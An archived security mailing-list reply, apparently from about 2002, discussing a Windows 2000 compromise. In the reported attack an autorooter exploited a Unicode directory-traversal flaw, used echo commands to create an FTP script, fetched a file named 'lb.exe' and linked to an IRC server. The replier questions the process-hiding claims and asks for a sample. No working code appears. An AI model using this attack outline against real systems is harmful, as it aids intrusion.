Cody, Of all of the responses I've seen so far, yours is by far the most informative. Thanks. > I saw a Win2000 machine rooted just last week by an > autorooter taking > advantage of the pre-10pack rollup Microsoft put out > just recently. It > was hacked through a Unicode attack by an > auto-rooter from Russia, > connected to an ftp site in Moscow and downloaded a > file named "lb.exe", I guess the specifics are that using the dir transversal exploit (patch published in Nov '00...ouch!), this autorooter sent echo commands to the system to create and launch the ftp script file. Do you have a copy of "lb.exe", by chance? > which, when run connects to an IRC server in Moscow, > loads an > auto-rooter with a list of servers to attack, and > hides the processes > from netstat, Program Manager, etc. It was pretty > slick. This is interesting. First off, neither netstat nor Program Manager show process information, so hiding process info from them isn't tough. I'm going to assume you mean Task Manager...but again, that's an API call to hide a process from TM. Netstat on XP will show process info, but not on NT/2K. I'd be interested in getting a copy of lb.exe to look at, or some more specifics on this ability to hide processes you mentioned... __________________________________________________ Do You Yahoo!? Yahoo! Health - your guide to health and wellness http://health.yahoo.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu May 02 2002 - 15:47:02 PDT